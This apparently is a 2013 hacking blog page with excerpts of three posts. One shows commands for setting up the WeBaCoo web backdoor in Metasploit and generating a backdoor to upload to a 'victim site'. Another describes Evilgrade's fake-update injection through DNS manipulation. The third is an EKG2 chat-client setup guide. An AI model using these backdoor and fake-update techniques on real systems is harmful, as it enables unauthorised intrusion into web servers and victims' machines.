Posts

Showing posts from August, 2013

webacoo module metasploit "web backdoor"

Image
Good evening readers Art Of Explo1t =) after a long time does not make a post, this evening I again gave interesting exploitation techniques. We will utilize webacoo on metasploit module and then try to connect to a victim site which serves as a backdoor so that the attacker can freely enter into the victim's web server Equipments :  1. Webacoo 2. Metasploit the operating system that I use (Kali Linux) webacoo located in the directory /usr/share/webacoo/ For Download : # git clone https://github.com/anestisb/WeBaCoo.git then we move the webacoo metasploit modules to directory /usr/share/metasploit-framework/modules/exploits/multi/http/ # cp /usr/share/webacoo/msf_webacoo_module.rb /usr/share/metasploit-framework/modules/exploits/multi/http/ it serves to webacoo module can be run on metasploit # msfconsole -q msf > search webacoo next, we create a backdoor using webacoo that we will upload to the victim site. # webacoo -g -o /tmp/we

Evilgrade + Metasploit Vs Windows Update

Image
Evilgrade Description: Evilgrade is a Penetration Testing  tool to inject a fake update into the victim system. There are 63 modules on evilgrade and every modules has a structure that need to imitate or inject a fake update an application / system specific to the victim system and also has its own webserver and dnsserver module so that attacks can be faster at doing the attacker (attacker). will happen "Manipulation Of Victim's DNS Traffic" or we can call it by manipulating / dns trick against traffict victim when the attacker (attacker) is able to create a diversion Hostname. Operation System that I use is Kali Linux 1.0.1 i386. Equipments: * Evilgrade * Ettercap * Metasploit

EKG2 Configuration to chat on Command Line

Image
Description Eksperymentalny Klient Gadu-Gadu or EKG2 is a IM client to a unique system.  EKG2 also supports many different protocols such as IRC, XMPP and other protocols that support interfaces based on ncurses. so, we can use this tool to chat via the command line "CLI" Installation. # apt-get install ekg2 seen in the picture above is where I have installed the tool. if the tool is not available, you can download in advance using the command: # git clone git://github.com/leafnode/ekg2.git wait until the download is completed Configuration: after the installation phase is complete, then run the tool using the command: # ekg2 previous account that I use has connected, then to perform initial configuration using the following command: > session -a xmpp:4k4.HH@chat.facebook.com seen in the picture above I have created a new session using the username 4k4.HH configure your facebook password: > session password YOUR_PASSWORD_HER